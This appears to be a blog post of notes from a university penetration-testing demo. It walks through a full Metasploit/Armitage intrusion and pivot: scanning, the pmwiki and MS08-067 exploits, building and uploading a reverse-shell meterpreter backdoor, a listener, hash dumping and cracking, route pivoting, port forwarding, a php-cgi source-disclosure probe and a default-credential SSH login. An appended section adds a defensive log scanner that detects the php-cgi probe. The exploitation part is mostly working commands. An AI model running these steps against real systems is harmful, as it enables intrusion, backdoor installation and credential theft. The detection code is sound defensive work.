UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 
  • Find attacks
  • Visit site ( and attack
  • Exploit using CVE-2011-4453 (pmwiki). GUI fails -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost
exploit -j
sessions -v
  • Check out the system (sysinfo, ps, getuid). No hashdump/winenum/route: php-meterpreter does not have full functionality, so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
  • cat /root/Tools/meh.php
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost
set lport 8443
exploit -j
  • Open a Terminal and
  • Second session now has full system privs
  • Get hashdump
  • Crack with ophcrack
  • Check out routes with ipconfig/route (time to pivot!) 
route add 2
  • Scan subnet using arpscan
run arp_scanner -r
  • Scan hosts using metasploit tcp scanner
  • Locate windows server
  • Locate linux server
  • Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
exploit -j
  • Take hash and crack with ophcrack
  • Compromise linux box
  • Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r
  • Test the php-cgi exploit against it from a local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
run -j

That's all for now..
Stay tuned :)
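
Added example, not part of the original notes: a defender's check for the `?-s` request used in the php-cgi test step above. It scans web access log lines for query strings that contain no unencoded `=` and decode to a leading `-`, which a CGI binary receives as a command-line switch. The log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not from the demo).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2013:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2013:10:00:05 +0000] "GET /configuration.php?-s HTTP/1.1" 200 18234',
    '10.0.0.9 - - [01/Jan/2013:10:00:09 +0000] "GET /configuration.php?%2Ds HTTP/1.1" 200 18234',
    '10.0.0.7 - - [01/Jan/2013:10:00:12 +0000] "GET /search.php?q=-s HTTP/1.1" 200 900',
]

# Pull client IP, request target and status out of a log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def is_cgi_switch_query(target):
    """True when the query string would reach a CGI binary as a switch.

    CGI hands a query string with no unencoded '=' to the program as
    command-line arguments, so one that decodes to a leading '-' is
    read as an option rather than as form data.
    """
    _path, sep, query = target.partition("?")
    if not sep or not query:
        return False
    if "=" in query:  # a literal '=' means ordinary key=value data
        return False
    decoded = unquote(query.replace("+", " ")).lstrip()
    return decoded.startswith("-")


def find_probes(lines):
    """Return (ip, target, status) for every suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and is_cgi_switch_query(m.group("target")):
            hits.append((m.group("ip"), m.group("target"), int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, target, status in find_probes(SAMPLE_LOG):
        print(f"{ip} requested {target} (status {status})")
```

A 200 response to such a request with a body far larger than the normal page is worth a closer look, since `-s` makes a vulnerable php-cgi return the script source.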

